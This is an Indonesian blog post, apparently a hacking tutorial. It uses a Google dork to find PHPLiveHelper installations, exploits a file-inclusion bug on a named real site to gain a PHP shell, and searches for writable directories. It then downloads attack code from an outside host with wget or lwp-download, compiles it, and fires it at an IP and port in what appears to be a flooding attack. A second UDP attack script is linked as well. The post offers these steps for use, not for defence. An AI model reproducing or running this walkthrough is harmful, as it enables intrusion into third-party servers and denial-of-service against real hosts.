tulisan ini ditulis oleh bestfuture.wordpress.com
Langkah pertama kita harus punya server yang siap inject [jika belum punya cari aja di Google. Berikut ini triksnya th3sn0wbr4in sedikit target dan bug-bug yang mudah-mudahan masih bisa dipake di sini. Untuk contoh ini dipakai Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google aku coba searching memakai
allinurl:"/PHPLiveHelper/*.php" akhirnya dapat salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495 c2b40a5dd3&department=1&livename=
Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171 c549536495c2b40a5dd3&department=1&livename= dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadi:
http://www.maldivesrds.com/phplivehe...4in/tusuk.htm?
Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), Tidak masalah ...
Cari Direktory yang bisa ditulis sama user nobody. Seperti biasa, ketik command linuxnya. Coba ketik find / -type d -perm 777 atau find / -type d -user nobody . Nah, nanti banyak tuch yang keluar...
/* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi 777 (rwx) untuk siapapun, termasuk user nobody */
/* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody. Karena pemilik Directory bisa melakukan apapun pada Directory miliknya */
Cari dibelakangnya tidak ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.
Download file untuk tembak dengan menggunakan wget. Ketikan wget http://freewebs.com/th3sn0wbr4in/tembak.c. Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download. Ketik lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung. Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :
–02:39:51– http://freewebs.com/th3sn0wbr4in/tembak.c => `tembak.c’
Resolving freewebs.com… 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 3,744 [text/x-csrc]
0K … 100% 30.89 KB/s
02:39:51 (30.89 KB/s) – `Sambit.c’ saved [3764/3764]
Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya… Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
tidak menggunakan Ekstensi). Ketik: gcc tembak.c -o tembak
Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera.
Nah…sekarang, jalankan file tembak tadi. Ketikkan :
- ./tembak 219.83.4.68 80
- ./ adalah Directory tempat kita menaruh file tembak
- 219.83.4.68 IP Warnet tempat gw maen
- 80 No Port. 80 untuk HTTP a.k.a Browsing
selain file tembak.c bisa juga memakai file upload-an berikut: http://malanghack.net/alat/udp.txt
Silahkan bereksperimen. Thank to th3sn0wbr4in
Belum Ada Tanggapan
Belum ada komentar.
Komentar RSS Lacak Balik URI Pengenal
Tinggalkan komentar
